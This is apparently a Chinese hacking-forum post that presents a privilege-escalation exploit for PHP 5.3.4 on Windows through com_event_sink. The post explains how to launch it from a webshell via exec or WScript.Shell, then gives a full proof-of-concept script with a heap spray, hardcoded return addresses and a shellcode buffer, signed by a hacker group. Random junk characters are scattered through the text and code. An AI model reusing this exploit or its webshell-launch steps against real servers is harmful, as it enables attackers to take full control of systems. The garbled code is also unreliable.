PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中

) I$ P4 V9 ?7 ]' s+ M; U测试方法如下：cmd /c x:\php\php.exe x:\test.php

; u) J( |$ I$ n6 I8 f下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
6 L# y0 f" r7 t! J1 g( Q3 L+ v这里是两个测试的截图：



/ R; h* k0 I  h! f$ c" x4 k
1 |, f* h% H' Y
3 T7 o) ^. F+ m% {; T成功利用此漏洞的攻击者将获得系统的最高权限
, Y& y' J% o9 X- a0 N
" M0 s2 F- o/ N- Q

* [0 U3 j# G  i& F

关于漏洞分析稍后附上。一下是PoC代码：
, R, f+ J9 x% e' w
' q# q/ L: J4 Z6 \& N. K+ I<?php
3 i* x8 m+ m3 A* S# Z- C+ U" M//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
//$eip ="\x44\x43\x42\x41";
7 v- U. _9 ]- R$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);
( w, V$ s6 g  _  A7 t6 w) l" k5 o  d//048d0190
. k& ?6 `% R: n  F- X2 |echo strlen($axespray);
" S+ o7 g4 D5 G- q- Wecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
" G2 S* @2 J& T2 y5 m$ Q, recho "Silic Group Hacker Army - BlackBap.Org";
2 C! a5 |5 R7 ~+ c- T7 [) m! f//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
8 _5 E+ G6 F- g) ~$u[] =$deodrant;
$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
$vVar = new VARIANT(0x048d0000+180);
7 \3 f, v6 s" s1 N0 D! y# h' j& v//弹窗代码(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
; l" o; U" T3 Z5 f# [5 D* N$var2 = new VARIANT(0x41414242);
! {& E7 k9 ^4 Ncom_event_sink($vVar,$var2,$buffer);
?>